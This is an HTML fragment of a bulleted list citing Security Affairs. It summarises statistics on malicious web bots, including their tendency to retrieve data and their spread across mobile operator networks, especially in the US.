<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Bad bots are 5 times more likely to attempt to ‘Get’ data/information than ‘Post’ it</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>The <a href="http://securityaffairs.co/wordpress/12862/malware/mobile-botnets-from-anticipation-to-reality.html" style="color: #4265a7; font-weight: bold; text-decoration: none;" target="_blank" title="Mobile Botnets: From anticipation to reality!">Mobile bad bot</a> threat is gaining significance, with bad bots running across 9 of the world’s top 10 mobile operators</em></li>
<li style="background-image: url(http://securityaffairs.co/wordpress/wp-content/themes/titan/images/list-item.gif); background-position: 0px 0.3em; background-repeat: no-repeat no-repeat; display: block; margin: 5px 0px; padding: 0px 0px 0px 17px;"><em>Mobile bad bots are far more prevalent in the US mobile networks than those of other nations</em></li>
</ul>
<span style="color: #444444; font-family: Arial, Helvetica, sans-serif; font-size: x-small;"><span style="line-height: 26.399999618530273px;"><i><a href="http://securityaffairs.co/wordpress/24266/cyber-crime/bad-bot-landscape.html" target="_blank">http://securityaffairs.co/wordpress/24266/cyber-crime/bad-bot-landscape.html</a></i></span></span>
